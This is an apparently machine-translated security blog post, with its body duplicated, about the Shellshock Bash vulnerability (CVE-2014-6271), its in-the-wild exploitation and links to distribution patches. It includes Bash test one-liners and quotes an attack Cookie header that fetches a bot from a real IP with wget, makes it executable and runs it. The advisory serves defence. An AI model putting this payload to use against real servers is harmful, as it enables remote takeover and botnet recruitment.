Vulnerability ShellShock exploited in-the-wild
The shellshock vulnerability (CVE-2014-6271) on the scale and consequences for the worldwide network and the devices connected to it can only be compared with the infamous Heartbleed , which was discovered this spring. This name has received a vulnerability in the command interpreter Bash , which is used in various modifications and distributions of Linux, Unix, Apple OS X (including the latest version of OS X Mavericks), as well as Android. Vulnerability is assigned the highest - 10th level of danger , and all versions of the interpreter, including the latest 4.3, are vulnerable.
The main danger of Shellshock is due to the fact that it allows you to remotely execute code on a vulnerable OS (execute the necessary commands for the attacking commands with an interpreter). At the same time, from the point of view of exploiting a vulnerability, this is quite simple. Bash itself is attracted to use in CGI scripts (which allows remote operation), which run on web servers and not only, for example, using the cgi_module component. One of the malicious programs delivered by the attackers to the compromised server is detected by ESET AV products as Linux / DDoS.M.
')
Checking the presence of a vulnerability in Bash is quite simple; the following command can be used for this.
Fig. Demonstration of a vulnerable interpreter on OS X Snow Leopard.
Due to the presence of the sequence of characters "() {:;};" at the beginning of the interpreter command, which trigger the vulnerability, the interpreter "eats" the rest of the command and executes it, although it should show a syntax error message.
Fig. Behavior of Bash on Gentoo Linux with the patch applied. Missing output is vulnerable.
Fig. The first patch for Linux Ubuntu also contained flaws.
The next command can check if the system is vulnerable after applying the patch. If the current date is displayed, the problem remains.
After the appearance of information about this vulnerability, a real-life example of the exploitation of the vulnerability was made publicly available, which allowed you to remotely copy the executable ELF file to the server. To do this, attackers can use various header fields of the HTTP protocol request, which fall into the CGI script and then executed by the vulnerable version of Bash. An example of one of these query arguments is presented below. Getting into Bash interpreter commands download the file from a remote server and set the necessary access rights for it.
The malware for Linux that we observed in this campaign were bots that open up access for malicious users to a remote server (backdoor) and also specialize in organizing DDoS attacks. Three known modifications of these malware are detected by our AV products like Linux / DDoS.M.
To obtain security updates on this vulnerability for Linux distributions, please use the following links.
We recommend using updates for the respective products and installing them as soon as possible.
be secure.
The main danger of Shellshock is due to the fact that it allows you to remotely execute code on a vulnerable OS (execute the necessary commands for the attacking commands with an interpreter). At the same time, from the point of view of exploiting a vulnerability, this is quite simple. Bash itself is attracted to use in CGI scripts (which allows remote operation), which run on web servers and not only, for example, using the cgi_module component. One of the malicious programs delivered by the attackers to the compromised server is detected by ESET AV products as Linux / DDoS.M.
')
Checking the presence of a vulnerability in Bash is quite simple; the following command can be used for this.
$ env x='() { :;}; echo vulnerable' bash -c "echo completed"Fig. Demonstration of a vulnerable interpreter on OS X Snow Leopard.
Due to the presence of the sequence of characters "() {:;};" at the beginning of the interpreter command, which trigger the vulnerability, the interpreter "eats" the rest of the command and executes it, although it should show a syntax error message.
host @ host2 ~ $ env x = '() {:;}; echo vulnerable 'bash -c "echo completed"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x '
completed
Fig. Behavior of Bash on Gentoo Linux with the patch applied. Missing output is vulnerable.
Fig. The first patch for Linux Ubuntu also contained flaws.
The next command can check if the system is vulnerable after applying the patch. If the current date is displayed, the problem remains.
env X='() { (a)=>\' sh -c "echo date"; cat echoAfter the appearance of information about this vulnerability, a real-life example of the exploitation of the vulnerability was made publicly available, which allowed you to remotely copy the executable ELF file to the server. To do this, attackers can use various header fields of the HTTP protocol request, which fall into the CGI script and then executed by the vulnerable version of Bash. An example of one of these query arguments is presented below. Getting into Bash interpreter commands download the file from a remote server and set the necessary access rights for it.
.Cookie: (). {.:;.}; .Wget.-O. / Tmp / besh.http: //162.253.66.76/nginx; .chmod.777. / Tmp / besh; ./tmp/besh;
The malware for Linux that we observed in this campaign were bots that open up access for malicious users to a remote server (backdoor) and also specialize in organizing DDoS attacks. Three known modifications of these malware are detected by our AV products like Linux / DDoS.M.
To obtain security updates on this vulnerability for Linux distributions, please use the following links.
- CentOS centosnow.blogspot.com/2014/09/critical-bash-updates-for-centos-5.html
- Red Hat access.redhat.com/articles/1200223
- Ubuntu www.ubuntu.com/usn/usn-2362-1
- Novell / SUSE - support.novell.com/security/cve/CVE-2014-6271.html
- Debian www.debian.org/security/2014/dsa-3032 www.debian.org/security/2014/dsa-3035
We recommend using updates for the respective products and installing them as soon as possible.
be secure.
Source: https://habr.com/ru/post/238257/
All Articles